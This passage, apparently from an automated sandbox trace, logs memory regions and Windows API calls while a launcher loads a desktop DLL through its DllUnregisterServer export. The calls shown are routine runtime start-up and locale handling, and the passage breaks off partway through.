"97328f~1.dll" filename = "\\Users\\EEBsYm5\\Desktop\\97328F~1.DLL" (normalized: "c:\\users\\eebsym5\\desktop\\97328f~1.dll") Region: id = 1141 start_va = 0x762e0000 end_va = 0x762f8fff entry_point = 0x762e0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 1142 start_va = 0x76700000 end_va = 0x7679ffff entry_point = 0x76700000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 1143 start_va = 0x1200000 end_va = 0x13bffff entry_point = 0x0 region_type = private name = "private_0x0000000001200000" filename = "" Region: id = 1144 start_va = 0x77510000 end_va = 0x77544fff entry_point = 0x77510000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 1145 start_va = 0x762d0000 end_va = 0x762d5fff entry_point = 0x762d0000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 1146 start_va = 0x10f0000 end_va = 0x116ffff entry_point = 0x0 region_type = private name = "private_0x00000000010f0000" filename = "" Thread: id = 52 os_tid = 0xb68 [0032.529] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x14fac4 | out: lpSystemTimeAsFileTime=0x14fac4*(dwLowDateTime=0xe11d20d0, dwHighDateTime=0x1d3dfba)) [0032.529] GetCurrentProcessId () returned 0xb64 [0032.529] GetCurrentThreadId () returned 0xb68 [0032.529] GetTickCount () returned 0x174a2 [0032.529] QueryPerformanceCounter (in: lpPerformanceCount=0x14fabc | out: lpPerformanceCount=0x14fabc*=364135151) returned 1 [0032.530] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0032.530] GetProcAddress (hModule=0x761d0000, lpProcName="FlsAlloc") returned 0x7622418d [0032.530] GetProcAddress (hModule=0x761d0000, lpProcName="FlsGetValue") returned 0x76221e16 [0032.530] GetProcAddress (hModule=0x761d0000, lpProcName="FlsSetValue") returned 0x762276e6 [0032.530] GetProcAddress (hModule=0x761d0000, lpProcName="FlsFree") returned 0x76221f61 [0032.530] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0032.530] GetProcAddress (hModule=0x761d0000, lpProcName="EncodePointer") returned 0x77f1a295 [0032.530] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0032.530] GetProcAddress (hModule=0x761d0000, lpProcName="EncodePointer") returned 0x77f1a295 [0032.530] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0032.530] GetProcAddress (hModule=0x761d0000, lpProcName="EncodePointer") returned 0x77f1a295 [0032.530] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0032.530] GetProcAddress (hModule=0x761d0000, lpProcName="EncodePointer") returned 0x77f1a295 [0032.530] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0032.531] GetProcAddress (hModule=0x761d0000, lpProcName="EncodePointer") returned 0x77f1a295 [0032.531] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0032.531] GetProcAddress (hModule=0x761d0000, lpProcName="EncodePointer") returned 0x77f1a295 [0032.531] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0032.531] GetProcAddress (hModule=0x761d0000, lpProcName="EncodePointer") returned 0x77f1a295 [0032.531] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0032.531] GetProcAddress (hModule=0x761d0000, lpProcName="DecodePointer") returned 0x77f1cd10 [0032.531] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0032.531] GetProcAddress (hModule=0x761d0000, lpProcName="DecodePointer") returned 0x77f1cd10 [0032.532] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0032.532] GetProcAddress (hModule=0x761d0000, lpProcName="EncodePointer") returned 0x77f1a295 [0032.532] GetProcAddress (hModule=0x761d0000, lpProcName="DecodePointer") returned 0x77f1cd10 [0032.532] GetCurrentThreadId () returned 0xb68 [0032.532] GetCommandLineA () returned="\"C:\\Windows\\System32\\goRcteXxZX.exe\" /dll=\"C:\\Users\\EEBsYm5\\Desktop\\97328F~1.DLL\" /fn_id=DllUnregisterServer /fn_args=\"1\"" [0032.532] GetEnvironmentStringsW () returned 0x2f78f0* [0032.532] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ALLUSERSPROFILE=C:\\ProgramData", cchWideChar=992, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 992 [0032.532] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ALLUSERSPROFILE=C:\\ProgramData", cchWideChar=992, lpMultiByteStr=0x13b09f0, cbMultiByte=992, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ALLUSERSPROFILE=C:\\ProgramData", lpUsedDefaultChar=0x0) returned 992 [0032.532] FreeEnvironmentStringsW (penv=0x2f78f0) returned 1 [0032.532] GetStartupInfoA (in: lpStartupInfo=0x14fa14 | out: lpStartupInfo=0x14fa14*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\System32\\goRcteXxZX.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0xffffffff, hStdOutput=0xffffffff, hStdError=0xffffffff)) [0032.532] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0032.532] GetStdHandle (nStdHandle=0xfffffff5) returned 0x0 [0032.532] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0032.532] SetHandleCount (uNumber=0x20) returned 0x20 [0032.532] GetLastError () returned 0x0 [0032.532] SetLastError (dwErrCode=0x0) [0032.532] GetLastError () returned 0x0 [0032.533] SetLastError (dwErrCode=0x0) [0032.533] GetLastError () returned 0x0 [0032.533] SetLastError (dwErrCode=0x0) [0032.533] GetACP () returned 0x4e4 [0032.533] GetLastError () returned 0x0 [0032.533] SetLastError (dwErrCode=0x0) [0032.533] IsValidCodePage (CodePage=0x4e4) returned 1 [0032.533] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x14f9f4 | out: lpCPInfo=0x14f9f4) returned 1 [0032.533] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x14f4c0 | out: lpCPInfo=0x14f4c0) returned 1 [0032.533] GetLastError () returned 0x0 [0032.533] SetLastError (dwErrCode=0x0) [0032.533] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr="", cchSrc=1, lpCharType=0x14f450 | out: lpCharType=0x14f450) returned 1 [0032.533] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x14f8d4, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0032.533] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x14f8d4, cbMultiByte=256, lpWideCharStr=0x14f238, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0032.533] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpCharType=0x14f4d4 | out: lpCharType=0x14f4d4) returned 1 [0032.533] GetLastError () returned 0x0 [0032.533] SetLastError (dwErrCode=0x0) [0032.533] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr="", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 1 [0032.533] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x14f8d4, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0032.533] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x14f8d4, cbMultiByte=256, lpWideCharStr=0x14f208, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ栳矲狰Ā") returned 256 [0032.533] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ栳矲狰Ā", cchSrc=256, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 256 [0032.533] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ栳矲狰Ā", cchSrc=256, lpDestStr=0x14eff8, cchDest=256 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0032.533] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchWideChar=256, lpMultiByteStr=0x14f7d4, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿsYzô\x0cú\x14", lpUsedDefaultChar=0x0) returned 256 [0032.533] GetLastError () returned 0x0 [0032.533] SetLastError (dwErrCode=0x0) [0032.533] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x14f8d4, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0032.533] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x14f8d4, cbMultiByte=256, lpWideCharStr=0x14f228, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ栳矲狰Ā") returned 256 [0032.533] LCMapStringW (in: Locale=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ栳矲狰Ā", cchSrc=256, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 256 [0032.533] LCMapStringW (in: Locale=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ栳矲狰Ā", cchSrc=256, lpDestStr=0x14f018, cchDest=256 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸĀ") returned 256 [0032.533] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸĀ", cchWideChar=256, lpMultiByteStr=0x14f6d4, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x8a\x9b\x8c\x9d\x8e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞ\x9f \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿsYzô\x0cú\x14", lpUsedDefaultChar=0x0) returned 256 [0032.534] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x72f1d9a8, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\goRcteXxZX.exe" (normalized: "c:\\windows\\system32\\gorctexxzx.exe")) returned 0x22 [0032.534] GetLastError () returned 0x0 [0032.534] SetLastError (dwErrCode=0x0) [0032.534] GetLastError () returned 0x0 [0032.534] SetLastError (dwErrCode=0x0) [0032.534] GetLastError () returned 0x0 [0032.534] SetLastError (dwErrCode=0x0) [0032.534] GetLastError () returned 0x0 [0032.534] SetLastError (dwErrCode=0x0) [0032.534] GetLastError () returned 0x0 [0032.534] SetLastError (dwErrCode=0x0) [0032.534] GetLastError () returned 0x0 [0032.534] SetLastError (dwErrCode=0x0) [0032.534] GetLastError () returned 0x0 [0032.534] SetLastError (dwErrCode=0x0) [0032.534] GetLastError () returned 0x0 [0032.534] SetLastError (dwErrCode=0x0) [0032.534] GetLastError () returned 0x0 [0032.534] SetLastError (dwErrCode=0x0) [0032.534] GetLastError () returned 0x0 [0032.534] SetLastError (dwErrCode=0x0) [0032.534] GetLastError () returned 0x0 [0032.534] SetLastError (dwErrCode=0x0) [0032.534] GetLastError () returned 0x0 [0032.535] SetLastError (dwErrCode=0x0) [0032.535] GetLastError () returned 0x0 [0032.535] SetLastError (dwErrCode=0x0) [0032.535] GetLastError () returned 0x0 [0032.535] SetLastError (dwErrCode=0x0) [0032.535] GetLastError () returned 0x0 [0032.535] SetLastError (dwErrCode=0x0) [0032.535] GetLastError () returned 0x0 [0032.535] SetLastError (dwErrCode=0x0) [0032.535] GetLastError () returned 0x0 [0032.535] SetLastError (dwErrCode=0x0) [0032.535] GetLastError () returned 0x0 [0032.535] SetLastError (dwErrCode=0x0) [0032.535] GetLastError () returned 0x0 [0032.535] SetLastError (dwErrCode=0x0) [0032.535] GetLastError () returned 0x0 [0032.535] SetLastError (dwErrCode=0x0) [0032.535] GetLastError () returned 0x0 [0032.535] SetLastError (dwErrCode=0x0) [0032.535] GetLastError () returned 0x0 [0032.535] SetLastError (dwErrCode=0x0) [0032.535] GetLastError () returned 0x0 [0032.535] SetLastError (dwErrCode=0x0) [0032.535] GetLastError () returned 0x0 [0032.536] SetLastError (dwErrCode=0x0) [0032.536] GetLastError () returned 0x0 [0032.536] SetLastError (dwErrCode=0x0) [0032.536] GetLastError () returned 0x0 [0032.536] SetLastError (dwErrCode=0x0) [0032.536] GetLastError () returned 0x0 [0032.536] SetLastError (dwErrCode=0x0) [0032.536] GetLastError () returned 0x0 [0032.536] SetLastError (dwErrCode=0x0) [0032.536] GetLastError () returned 0x0 [0032.536] SetLastError (dwErrCode=0x0) [0032.536] GetLastError () returned 0x0 [0032.536] SetLastError (dwErrCode=0x0) [0032.536] GetLastError () returned 0x0 [0032.536] SetLastError (dwErrCode=0x0) [0032.536] GetLastError () returned 0x0 [0032.536] SetLastError (dwErrCode=0x0) [0032.536] GetLastError () returned 0x0 [0032.536] SetLastError (dwErrCode=0x0) [0032.536] GetLastError () returned 0x0 [0032.536] SetLastError (dwErrCode=0x0) [0032.536] GetLastError () returned 0x0 [0032.536] SetLastError (dwErrCode=0x0) [0032.536] GetLastError () returned 0x0 [0032.537] SetLastError (dwErrCode=0x0) [0032.537] GetLastError () returned 0x0 [0032.537] SetLastError (dwErrCode=0x0) [0032.537] GetLastError () returned 0x0 [0032.537] SetLastError (dwErrCode=0x0) [0032.537] GetLastError () returned 0x0 [0032.537] SetLastError (dwErrCode=0x0) [0032.537] GetLastError () returned 0x0 [0032.537] SetLastError (dwErrCode=0x0) [0032.537] GetLastError () returned 0x0 [0032.537] SetLastError (dwErrCode=0x0) [0032.537] GetLastError () returned 0x0 [0032.537] SetLastError (dwErrCode=0x0) [0032.537] GetLastError () returned 0x0 [0032.537] SetLastError (dwErrCode=0x0) [0032.537] GetLastError () returned 0x0 [0032.537] SetLastError (dwErrCode=0x0) [0032.537] GetLastError () returned 0x0 [0032.537] SetLastError (dwErrCode=0x0) [0032.537] GetLastError () returned 0x0 [0032.537] SetLastError (dwErrCode=0x0) [0032.537] GetLastError () returned 0x0 [0032.537] SetLastError (dwErrCode=0x0) [0032.537] GetLastError () returned 0x0 [0032.537] SetLastError (dwErrCode=0x0) [0032.537] GetLastError () returned 0x0 [0032.537] SetLastError (dwErrCode=0x0) [0032.538] GetLastError () returned 0x0 [0032.538] SetLastError (dwErrCode=0x0) [0032.538] GetLastError () returned 0x0 [0032.538] SetLastError (dwErrCode=0x0) [0032.538] GetLastError () returned 0x0 [0032.538] SetLastError (dwErrCode=0x0) [0032.538] GetLastError () returned 0x0 [0032.538] SetLastError (dwErrCode=0x0) [0032.538] GetLastError () returned 0x0 [0032.538] SetLastError (dwErrCode=0x0) [0032.538] GetLastError () returned 0x0 [0032.538] SetLastError (dwErrCode=0x0) [0032.538] GetLastError () returned 0x0 [0032.538] SetLastError (dwErrCode=0x0) [0032.538] GetLastError () returned 0x0 [0032.538] SetLastError (dwErrCode=0x0) [0032.538] GetLastError () returned 0x0 [0032.538] SetLastError (dwErrCode=0x0) [0032.538] GetLastError () returned 0x0 [0032.538] SetLastError (dwErrCode=0x0) [0032.538] GetLastError () returned 0x0 [0032.538] SetLastError (dwErrCode=0x0) [0032.538] GetLastError () returned 0x0 [0032.538] SetLastError (dwErrCode=0x0) [0032.538] GetLastError () returned 0x0 [0032.538] SetLastError (dwErrCode=0x0) [0032.538] GetLastError () returned 0x0 [0032.538] SetLastError (dwErrCode=0x0) [0032.538] GetLastError () returned 0x0 [0032.538] SetLastError 